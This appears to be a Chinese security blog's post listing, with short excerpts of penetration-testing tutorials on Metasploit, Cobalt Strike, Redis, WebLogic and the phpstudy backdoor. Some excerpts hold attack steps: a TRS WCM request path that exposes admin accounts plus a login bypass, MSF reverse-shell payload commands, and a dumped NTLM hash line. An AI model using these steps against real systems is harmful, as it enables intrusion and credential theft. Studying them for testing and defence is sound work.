- 博客(25)
- 收藏
- 关注
RSS订阅转载 PhpStudy+Xdebug调试超时500解决方法 Apache2.4调试时间太短的问题
0x01 问题现象有时再用xdebug调试程序时,由于调试时间过长会出现500服务器错误的现象,根本原因在于apache默认的连接时间过短导致。0x02 适应于中间件:Apache(Fastcgi)错误日志为:End of script output before headers0x03解决办法打开apache配置文件注释掉如下,并添加一行。# Various default settingsInclude conf/extra/httpd-default.conf 将注释去掉Incl
2021-08-08 16:12:02
3574
原创 PHP伪协议
0x01 php伪协议php伪协议其实就是支持得协议与封装这种协议一共有12种file:// 访问本地文件系统http:// 访问http/https网址php:// 访问各个输入/输出流data:// 数据phar:// php归档zlib:// 压缩liuftp:// 访问FTP(S)URLSssh2:// Secure shell2rar:// RARogg:// 音频流except:// 处理交互式得流glob://
2021-08-07 12:40:11
821
1
原创 文件包含介绍以及代码分析
0x01 文件包含介绍文件包含漏洞是代码注入的一种,就是用户注入一段能控制的脚本或代码,并让服务端执行0x02 文件包含函数php文件包含主要由下面4种函数来完成的include()include_once()require()require_once当使用这4种函数包含一个新文件时,文件将作为php代码执行,php内核并不会在意被包含文件时什么类型,即使包含的时txt文件,图片文件。远程URL,也都将作为PHP代码执行区别require()的使用方法如:require(“xxx.p
2021-08-04 22:57:39
613
原创 MSF常用命令
0x01 msf获取shell启动 msfconsole搜索某个模块 search ms08-067使用某个模块 use exploit/windows/smb/ms08-067_netapi查看当前模块可以使用的payload[可以省略] show payloads查看当前模块需要的参数配置 show options[可略]选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp设置目标的IP地址 set RHOST 192
2021-08-04 11:19:03
3824
原创 CobaltStrike系列教程(六)文件/进程管理与键盘记录
0x001 文件管理选择一个会话,右键目标->文件管理即可进入目标机的文件页面下载文件右键download 然后点击菜单栏的下载按钮,可以看到自己下载的文件选择下载的文件,点击sync files,选择好保存路径即可下载文件执行或删除文件点击执行会让输入参数,如果不需要参数,跳过即可0x002进程管理选择一个beacon,右键,目标->进程列表1、kill:关闭该进程2、Refresh:刷新进程3、inject:把beacon注入到进程4、log Keysto
2021-02-09 23:34:31
1879
原创 CobaltStrike系列教程(五)凭据导出
0x001 凭据导出凭据通俗来说就是账号、密码凭据导出是测试中很重要的,通过导出凭据后,我们可以实现内网的横向移动0x002 Hashdump导出hash执行此过程必须是管理员权限,在执行–>转存Hash中Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::Administrator是用户名afffeba176210fad4628f0524bfe1942是md5加密后的
2021-02-09 22:16:41
279
原创 Cobaltstrike系列教程(四)菜单栏与视图
Cobaltstrike系列教程(四)菜单栏与视图0x001 CS菜单栏1、新建连接2、断开当前连接3、监听器4、Pivot Graph视图(显示各个目标的关心)5、Session Table视图(会话列表)6、Tatget Table视图(目标列表)7、查看凭据信息8、查看文件下载9、查看键盘记录10、查看屏幕解压11、生成无状态的beacon后门12、java自签名程序攻击13、生成office宏后门14、生成脚本通过web传递(利用powershell,bitadmin
2021-02-08 15:17:31
413
原创 redis未授权访问漏洞
0X01 漏洞介绍redis 默认情况下,会绑定再 0.0.0.0:6379, 如果没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源的ip访问,这样会将redis的服务暴漏在公网上,如果在没有设置密码认证的情况下,会导致任意用户可以访问目标服务器的情况下未授权访问redis以及读取redis数据。攻击者在未授权访问redis的情况下,利用redis自身提供的config命令,可以进行写文件的操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_
2021-01-18 14:42:18
922
1
原创 redis主从复制RCE 4.x/5.x
0x01 主从复制说明reids 虽然读取速度特别快,但也会产生读压力的,为了分担这个压力,redis支持主从复制,redis的主从结构可以采用一主多从或者级联结构,redis组从复制根据是否全量可以分为全量同步和增量同步全量同步Redis全量复制一般发生在Slave初始化阶段,这时Slave需要将Master上的所有数据都复制一份。具体步骤如下:从服务器连接主服务器,发送SYNC命令;主服务器接收到SYNC命名后,开始执行BGSAVE命令生成RDB文件并使用缓冲区记录此后执行的所有写命令;
2020-12-22 14:33:38
651
原创 CVE-2020-1938:Apache Tomca文件包含复现
0x01 漏洞简介Tomcat服务器是一个开源的、轻量级别的web应用服务器,在中小型系统和并发访问用户不是很高的场合下被普遍使用,是开发和调式JSP程序的首选。0x02 apache 和tomcat的区别对于apache和tomcat两个服务器,他们大多伴随出现,然而对于他们的具体区别总感到疑惑,所以就深入查看了一下:apache支持静态页,tomcat支持动态页,比如servlet等。一般使用apache+tomcat时,apache只是作为一个转发,对jsp的处理时tomcat来处理的。
2020-08-04 10:53:30
152
原创 TRS的WCM历史漏洞
1访问网站的登录页看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的2 在网址后面添加查看管理员密码的链接wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system...
2020-07-30 16:14:54
5171
原创 在centos上安装nmap
安装方式有两种1源码编译安装1 wget https://nmap.org/dist/nmap-7.80.tar.bz22 bzip2 -cd nmap-7.80.tar.bz2 | tar xvf –3 cd nmap-7.804 ./configure5 make6 make installRPM软件安装wget https://nmap.org/dist/nmap-7....
2020-04-07 23:25:05
662
原创 在Centos上安装jdk
1、使用宝塔或者winscp将jdk上传到服务器上2、解压jdk 文件: tar zxvf jdk1.8.0_91将解压的文件放到/usr/java下,若没有就是有mkdir创建一个3、修改环境变量 vim /etc/profile在profile中添加如下:JAVA_HOEM=/usr/java/jdk1.8.0_91PATH= $JAVA_HOME/bin: $PATHCLASS...
2020-04-07 23:16:04
95
1
原创 phpstudy后门利用
0x01 漏洞简介phpstudy是一个对初学php的人们很有帮助的工具,他集成的环境可以给初学者带来很多便捷之处,但是某些版本存在后门,如果服务器使用存在后门的phpstudy搭建,这样可以直接被人家getshell0x02 影响版本phpstudy 2016版php-5.4phpstudy 2018版php-5.2.17phpstudy 2018版php-5.4.450x03 ...
2020-03-25 20:29:10
820
原创 CVE-2018-2893 weblogic反序列化
0x01 漏洞介绍 Oracle官方发布了4月份的关键补丁更新CPU(Critical PatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),该漏洞修补不善导致被绕过。Oracle 官方发布的7月份补丁中修复了该漏洞,分配了漏洞编号CVE-2018-2893。通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协...
2020-03-12 22:38:02
1871
原创 vulhub靶场的搭建
0x01 docker的安装具体安装步骤看我武器库的docker博客,里面有安装步骤0x02 安装 docker-compose这个需要pip的支持所以先查看自己有,有没有pip的环境使用 pip show pip查看自己是否有pip环境若是没有需要安装,这里是pip2的安装命令sudo apt-get install python-pip安装完pip然后安装docker-co...
2020-03-09 12:49:15
354
原创 CNVD-C-2019-48814 WebLogic wls9-async 反序列化漏洞
0x01 漏洞介绍中国民生银行红蓝对抗演习时,红队使用这个0day,拿下防守方的服务器该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/—async/AsyncResponseSerce路径下传入构造好的恶意XML格式的数据,传入的数据在服务器端反序列化,执行1其中的恶意代码,从而可以getshell。序列化就是把对象转换成字节流,便于保存在内存、文件、数...
2020-03-07 18:28:27
624
1
原创 CVE-2018-2894 Weblogic任意文件上传
0x01 漏洞概述weblogic管理端未授权的两个页面在任意上传jsp文件漏洞,今儿获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.d...
2020-03-06 20:04:55
600
原创 Weblogic 中间件
中间件中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间.中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件.在众多关于中间件的定义中,比较普遍被接受的是IDC表述的:中间件是一种独立的系统软件或服务程序,分布式应...
2020-03-06 19:08:59
4181
原创 Cobalt Strike系列教程3 beacon详解
0x01 Beacon详解0x01.1 Beacon 命令通过系列教程2的学习,配置好Listeners,让目标及执行我们的payload后门程序后,即可发现目标主机已经上线右键目标选择使用Beacon,我们用它来执行各种命令== 在Cobalt Strike中他的默认心跳是60s(即sleep时间是60s,每一分钟目标主机与teamserver通信一次)这让我们执行命令或者进行其他操...
2020-02-04 16:46:21
1358
原创 Cobalt Strike系列2listener与payload
Cobalt Strike系列2 listener与payload0x01 Cobalt Strike listener简介Listener(监听器):专门用于对其他对象身上发生的事件或状态改变进行监听和相应处理的对象,当被监视的对象发生情况时,立即采取相应的行动。在许多的渗透工具中都有listener的存在。大家可以理解listener就是用来接收目标主机权限的模块。创建listener...
2020-02-04 00:48:41
1117
原创 cobalt strike系列1 部署
cobalt strike系列1 部署cobalt strike简介Cobalt strike是美国Read Team开发的渗透测试神器,简称CS。渗透小白的我正在学习整款工具,以此博客记录一下自己学习中遇到的问题。这款工具拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socke代理,office攻击,文件捆绑,钓鱼等功能。Cobalt Strike可以用于多人协作,它分为服务端...
2020-02-03 19:49:54
703
原创 Docker的安装与使用
0x01 Docker的定义Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker是一个基于Go语言开发的开源应用容器引擎,已经形成比较成熟的生态圈,让开发者可以打包自己的应用以及依赖包到一个轻量级的容器。Docker非常适合于搭建用于学习与实验的安全测试漏洞靶机。0x02 Docker认识镜像 、容器、 仓库镜像(image)Do...
2019-12-08 20:08:28
394
原创 浅谈cookie与session
0x01 什么是cookie与session0x02 cookie与session的区别0x03 cookie的参数设置0x04 代码说明0x01 cookie首先必须明确一点,存储cookie是浏览器提供的功能。cookie 其实是存储在浏览器中的纯文本,浏览器的安装目录下会专门有一个 cookie 文件夹来存放各个域下设置的cookie。当网页要发http请求时,浏览器会先检查是否...
2019-11-29 14:34:33
167
原创 SQL Injection(sql注入总结)
SQL Injection(sql注入总结)0x01 什么是sql注入0x02 sql注入的原理0x03 sql 注入的分类0x04 sql注入之万能密码0x05 sql 注入的系统函数0x06 sql 注入存在地方0x07 sql注入数据库表结构(MYSQL 5.0版本及以上版本)0x08 sql 手工注入的步骤0x01 什么是sql注入是一种常见的WEB安全漏洞,攻击者利用...
2019-11-05 18:25:19
1058
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人